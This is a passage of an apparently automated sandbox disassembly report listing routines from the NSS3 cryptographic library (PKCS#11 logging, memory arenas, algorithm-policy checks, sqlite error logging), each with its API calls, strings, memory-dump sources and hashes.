Part of subcall function 6CB909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB90BBA
Part of subcall function 6CB909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB90D7E

PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6CAB2D54

Part of subcall function 6CB909D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB90BCB
Part of subcall function 6CB909D0: EnterCriticalSection.KERNEL32(?), ref: 6CB90BDE
Part of subcall function 6CB909D0: OutputDebugStringA.KERNEL32(?), ref: 6CB90C16

Strings

slotID = 0x%x, xrefs: 6CAB2D02
ulPinLen = %d, xrefs: 6CAB2D36
pPin = 0x%p, xrefs: 6CAB2D1D
C_InitToken, xrefs: 6CAB2CE7
pLabel = 0x%p, xrefs: 6CAB2D4F

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
API String ID: 420000887-1567254798
Opcode ID: 9a6c2938af412dd7d7915d4dc08e689b38f39730e0ac92498d167e333d22448d
Instruction ID: 933ef6b386db25f38e7f0d2efcde4911a89a5c3f6fc65eb2ef9fdc5f82a564ec
Opcode Fuzzy Hash: 9a6c2938af412dd7d7915d4dc08e689b38f39730e0ac92498d167e333d22448d
Instruction Fuzzy Hash: C5210779200185EFDB40DF94ED8CA493BB9EB4A75DF488225F504A3622DF318D89CB62

Function 6CAB2AF0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetMechanismList), ref: 6CAB2B0C
PR_LogPrint.NSS3( pulCount = 0x%p,?), ref: 6CAB2B59

Part of subcall function 6CB909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CB90BAB
Part of subcall function 6CB909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB90BBA
Part of subcall function 6CB909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB90D7E

PR_LogPrint.NSS3( pMechanismList = 0x%p,?), ref: 6CAB2B3E

Part of subcall function 6CB909D0: OutputDebugStringA.KERNEL32(?), ref: 6CB90B88
Part of subcall function 6CB909D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CB90C5D
Part of subcall function 6CB909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6CB90C8D
Part of subcall function 6CB909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB90C9C
Part of subcall function 6CB909D0: OutputDebugStringA.KERNEL32(?), ref: 6CB90CD1
Part of subcall function 6CB909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CB90CEC
Part of subcall function 6CB909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB90CFB
Part of subcall function 6CB909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CB90D16
Part of subcall function 6CB909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6CB90D26
Part of subcall function 6CB909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB90D35
Part of subcall function 6CB909D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6CB90D65
Part of subcall function 6CB909D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6CB90D70
Part of subcall function 6CB909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CB90D90
Part of subcall function 6CB909D0: free.MOZGLUE(00000000), ref: 6CB90D99

PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6CAB2B25

Part of subcall function 6CB909D0: PR_Now.NSS3 ref: 6CB90A22
Part of subcall function 6CB909D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CB90A35
Part of subcall function 6CB909D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CB90A66
Part of subcall function 6CB909D0: PR_GetCurrentThread.NSS3 ref: 6CB90A70
Part of subcall function 6CB909D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CB90A9D
Part of subcall function 6CB909D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CB90AC8
Part of subcall function 6CB909D0: PR_vsmprintf.NSS3(?,?), ref: 6CB90AE8
Part of subcall function 6CB909D0: EnterCriticalSection.KERNEL32(?), ref: 6CB90B19
Part of subcall function 6CB909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CB90B48
Part of subcall function 6CB909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CB90C76
Part of subcall function 6CB909D0: PR_LogFlush.NSS3 ref: 6CB90C7E

PR_LogPrint.NSS3( *pulCount = 0x%x,?), ref: 6CAB2BC0

Strings

pulCount = 0x%p, xrefs: 6CAB2B54
*pulCount = 0x%x, xrefs: 6CAB2BBB
pMechanismList = 0x%p, xrefs: 6CAB2B39
slotID = 0x%x, xrefs: 6CAB2B20
C_GetMechanismList, xrefs: 6CAB2B07

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: DebugOutputPrintStringfflush$fwrite$R_snprintf$CriticalCurrentEnterExplodeFlushR_vsmprintfR_vsnprintfSectionThreadTimefputcfreememcpy
String ID: *pulCount = 0x%x$ pMechanismList = 0x%p$ pulCount = 0x%p$ slotID = 0x%x$C_GetMechanismList
API String ID: 1342304006-3652739913
Opcode ID: e9690f0d8674724a8d494a8c4735fe1c1c4860129dff1e2fccad38dd02900917
Instruction ID: 3e8d0c52cb155f17f50c044f6388a33caca7134648b53f2e55bf83f16244f4bb
Opcode Fuzzy Hash: e9690f0d8674724a8d494a8c4735fe1c1c4860129dff1e2fccad38dd02900917
Instruction Fuzzy Hash: 6321D335641186EFDB40DF54ED8CA4977B9EB4A7A9F084026F804A7711CF319988CB62

Function 6CB90EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Aborting,?,6CA72357), ref: 6CB90EB8
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6CA72357), ref: 6CB90EC0
PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CB90EE6

Part of subcall function 6CB909D0: PR_Now.NSS3 ref: 6CB90A22
Part of subcall function 6CB909D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CB90A35
Part of subcall function 6CB909D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CB90A66
Part of subcall function 6CB909D0: PR_GetCurrentThread.NSS3 ref: 6CB90A70
Part of subcall function 6CB909D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CB90A9D
Part of subcall function 6CB909D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CB90AC8
Part of subcall function 6CB909D0: PR_vsmprintf.NSS3(?,?), ref: 6CB90AE8
Part of subcall function 6CB909D0: EnterCriticalSection.KERNEL32(?), ref: 6CB90B19
Part of subcall function 6CB909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CB90B48
Part of subcall function 6CB909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CB90C76
Part of subcall function 6CB909D0: PR_LogFlush.NSS3 ref: 6CB90C7E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CB90EFA

Part of subcall function 6CA7AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6CA7AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB90F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB90F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB90F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB90F2B

Strings

Assertion failure: %s, at %s:%d, xrefs: 6CB90ED9, 6CB90EE5, 6CB90F06, 6CB90F0B
Aborting, xrefs: 6CB90EB3

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 3905088656-1374795319
Opcode ID: add7a0adeece0a794f6765b4b5b0b8a0b092d3df601b6cd2ab9a8123b32c9af4
Instruction ID: d9a7035f9c58d3ba6b05ae22c7b91fff901714b144fe8d7cee244cc2a1981ba4
Opcode Fuzzy Hash: add7a0adeece0a794f6765b4b5b0b8a0b092d3df601b6cd2ab9a8123b32c9af4
Instruction Fuzzy Hash: 49F0AFB99001687BEA007FA09C4AC9B3F3DEF8A264F004024FD0957602DA36E91496B7

Function 6CAF4DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6CAF4DCB

Part of subcall function 6CAE0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA887ED,00000800,6CA7EF74,00000000), ref: 6CAE1000
Part of subcall function 6CAE0FF0: PR_NewLock.NSS3(?,00000800,6CA7EF74,00000000), ref: 6CAE1016
Part of subcall function 6CAE0FF0: PL_InitArenaPool.NSS3(00000000,security,6CA887ED,00000008,?,00000800,6CA7EF74,00000000), ref: 6CAE102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6CAF4DE1

Part of subcall function 6CAE10C0: TlsGetValue.KERNEL32(?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE10F3
Part of subcall function 6CAE10C0: EnterCriticalSection.KERNEL32(?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE110C
Part of subcall function 6CAE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE1141
Part of subcall function 6CAE10C0: PR_Unlock.NSS3(?,?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE1182
Part of subcall function 6CAE10C0: TlsGetValue.KERNEL32(?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6CAF4DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CAF4E59

Part of subcall function 6CADFAB0: free.MOZGLUE(?,-00000001,?,?,6CA7F673,00000000,00000000), ref: 6CADFAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CBB300C,00000000), ref: 6CAF4EB8
SECOID_FindOID_Util.NSS3(?), ref: 6CAF4EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6CAF4F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CAF521A

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID:
API String ID: 1025791883-0
Opcode ID: 0ae364f49d5dc1848d40a6aa373bac8e626bcf310eeb78719b3fc37496f3e71e
Instruction ID: b03fbffa4f235bd307293f8c1fc8b8da79d116eecb52918d6d32d79959fbb999
Opcode Fuzzy Hash: 0ae364f49d5dc1848d40a6aa373bac8e626bcf310eeb78719b3fc37496f3e71e
Instruction Fuzzy Hash: F1F17C71E00209CFDB04CF58D9407ADB7B2BF49358F298169E925AB781E775E9C2CB90

Function 6CB06BA0 Relevance: 16.7, APIs: 11, Instructions: 248COMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(00000159,?,?,?,?,?,?,?,6CB10293), ref: 6CB06BC2
PR_SetError.NSS3(FFFFD016,00000000), ref: 6CB06C13
NSS_GetAlgorithmPolicy.NSS3(?), ref: 6CB06C39
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6CB06C6C
NSS_GetAlgorithmPolicy.NSS3(00000146,?), ref: 6CB06CAB
PR_SetError.NSS3(FFFFD016,00000000), ref: 6CB06CEE
PR_SetError.NSS3(FFFFD016,00000000), ref: 6CB06D2A
PR_SetError.NSS3(FFFFD016,00000000), ref: 6CB06D6D
PR_SetError.NSS3(FFFFD016,00000000), ref: 6CB06DBD
PR_SetError.NSS3(FFFFD016,00000000), ref: 6CB06E13
PR_SetError.NSS3(FFFFD016,00000000), ref: 6CB06EE9

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Error$AlgorithmPolicy
String ID:
API String ID: 644051021-0
Opcode ID: 1d07ef10aaeac26f8d7a01bf59aa594792fb82a65b2117c7b55e6673487e153d
Instruction ID: e3e8ae1d9ca66014a1c58648dead90ba941007250516181292f8034e7b46bc1c
Opcode Fuzzy Hash: 1d07ef10aaeac26f8d7a01bf59aa594792fb82a65b2117c7b55e6673487e153d
Instruction Fuzzy Hash: 61913332B042D98BEF109B6CDC517983A61DF0637CF284326DC67EBAD1EB6195C58352

Function 6CAF0C60 Relevance: 16.7, APIs: 11, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6CAF2C2A), ref: 6CAF0C81

Part of subcall function 6CADBE30: SECOID_FindOID_Util.NSS3(6CA9311B,00000000,?,6CA9311B,?), ref: 6CADBE44

Part of subcall function 6CAC8500: SECOID_GetAlgorithmTag_Util.NSS3(6CAC95DC,00000000,00000000,00000000,?,6CAC95DC,00000000,00000000,?,6CAA7F4A,00000000,?,00000000,00000000), ref: 6CAC8517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAF0CC4

Part of subcall function 6CADFAB0: free.MOZGLUE(?,-00000001,?,?,6CA7F673,00000000,00000000), ref: 6CADFAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CAF0CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6CAF0D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6CAF0D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6CAF0D7D
free.MOZGLUE(00000000), ref: 6CAF0DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAF0DC1
free.MOZGLUE(00000000), ref: 6CAF0DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAF0E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CAF0E0F

Part of subcall function 6CAC95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6CAA7F4A,00000000,?,00000000,00000000), ref: 6CAC95E0
Part of subcall function 6CAC95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6CAA7F4A,00000000,?,00000000,00000000), ref: 6CAC95F5
Part of subcall function 6CAC95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6CAC9609
Part of subcall function 6CAC95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CAC961D
Part of subcall function 6CAC95C0: PK11_GetInternalSlot.NSS3 ref: 6CAC970B
Part of subcall function 6CAC95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6CAC9756
Part of subcall function 6CAC95C0: PK11_GetIVLength.NSS3(?), ref: 6CAC9767
Part of subcall function 6CAC95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6CAC977E
Part of subcall function 6CAC95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CAC978E

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID:
API String ID: 3136566230-0
Opcode ID: dddf8aafe784732b9c389b0c423e393b085e62f8b6f5c03f2598ac2b843ac2ff
Instruction ID: d296ba01f80d2c6d414e81199a061aa83f4cf50c9dde78b056f0a58218b2dd01
Opcode Fuzzy Hash: dddf8aafe784732b9c389b0c423e393b085e62f8b6f5c03f2598ac2b843ac2ff
Instruction Fuzzy Hash: 7141C2B190024AABEB009F64DD45BAF7678AF0430CF144128E92567741EB35AA99CBF2

Function 6CA84FD0 Relevance: 16.6, APIs: 11, Instructions: 112COMMON

Download Yara Rule

APIs

PR_NewLock.NSS3(00000001,00000000,6CBD0148,?,6CA96FEC), ref: 6CA8502A
PR_NewLock.NSS3(00000001,00000000,6CBD0148,?,6CA96FEC), ref: 6CA85034
PL_NewHashTable.NSS3(00000000,6CADFE80,6CADFD30,6CB2C350,00000000,00000000,00000001,00000000,6CBD0148,?,6CA96FEC), ref: 6CA85055
PL_NewHashTable.NSS3(00000000,6CADFE80,6CADFD30,6CB2C350,00000000,00000000,?,00000001,00000000,6CBD0148,?,6CA96FEC), ref: 6CA8506D

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: HashLockTable
String ID:
API String ID: 3862423791-0
Opcode ID: c571ca9874a4ff19ea23d92a43b107f2e92327189b714d25a47a961562b9cf3d
Instruction ID: d0a999099985089c971f4a57782c99eec18b5c2ae18291bdeb53d443587024a3
Opcode Fuzzy Hash: c571ca9874a4ff19ea23d92a43b107f2e92327189b714d25a47a961562b9cf3d
Instruction Fuzzy Hash: 1E31C2B1B422119BFB449A65C84EF4737B8AB1BB88F194118E90783640D774DA84CBE3

Function 6CA22E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?), ref: 6CA22F3D
memset.VCRUNTIME140(?,00000000,?), ref: 6CA22FB9
memcpy.VCRUNTIME140(?,00000000,?), ref: 6CA23005
memcpy.VCRUNTIME140(?,?,?), ref: 6CA230EE
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CA23131
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA23178

Strings

database corruption, xrefs: 6CA2316C
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA23022, 6CA23156, 6CA23162, 6CA2318A, 6CA23196, 6CA231A2, 6CA231AE, 6CA231BA, 6CA231C6
%s at line %d of [%.10s], xrefs: 6CA23171

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: memcpy$memsetsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 984749767-598938438
Opcode ID: c321e43cc3b13b84bbadef1a71da8c78e1299a1a072349734c9300424e5cf009
Instruction ID: 116dcb940bb4608bff90c8e50f085000a94b4f66ae1eea64e16fdaa893f9a9ae
Opcode Fuzzy Hash: c321e43cc3b13b84bbadef1a71da8c78e1299a1a072349734c9300424e5cf009
Instruction Fuzzy Hash: 0DB1C270E062259BCF18CF9DC884AEEF7B5BF49314F284129E845B7B41D7789981CBA1

Function 6CAB6C40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestInit), ref: 6CAB6C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAB6C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAB6CA3

Part of subcall function 6CB9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CAB6CB9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6CAB6CD5

Strings

C_DigestInit, xrefs: 6CAB6C61
pMechanism = 0x%p, xrefs: 6CAB6CD0
(CK_INVALID_HANDLE), xrefs: 6CAB6C9C
hSession = 0x%x, xrefs: 6CAB6C7E, 6CAB6C8E

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
API String ID: 1003633598-3690128261
Opcode ID: a8bb2b0ad48fe9995fd480fd3f5952cf7e4a2f801623d43299cc0148e3142cc1
Instruction ID: 54740c676c7838142b154aaee050e460008cd6af3fd898ee037a5f25c19c4082
Opcode Fuzzy Hash: a8bb2b0ad48fe9995fd480fd3f5952cf7e4a2f801623d43299cc0148e3142cc1
Instruction Fuzzy Hash: 2F2148346001449BCB049F64EE88B9E37B9EB4B759F084029E509E7B02DF30998CCBA3

Function 6CA80F30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CA80F62
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CA80F84

Part of subcall function 6CADB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBB18D0,?), ref: 6CADB095

SEC_QuickDERDecodeItem_Util.NSS3(?,6CA9F59B,6CBA890C,?), ref: 6CA80FA8
PORT_Alloc_Util.NSS3(4C8B1474), ref: 6CA80FC1

Part of subcall function 6CAE0BE0: malloc.MOZGLUE(6CAD8D2D,?,00000000,?), ref: 6CAE0BF8
Part of subcall function 6CAE0BE0: TlsGetValue.KERNEL32(6CAD8D2D,?,00000000,?), ref: 6CAE0C15

memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6CA80FDB
PR_CallOnce.NSS3(6CBE2AA4,6CAE12D0), ref: 6CA80FEF
PL_FreeArenaPool.NSS3(?), ref: 6CA81001
PL_FinishArenaPool.NSS3(?), ref: 6CA81009

Strings

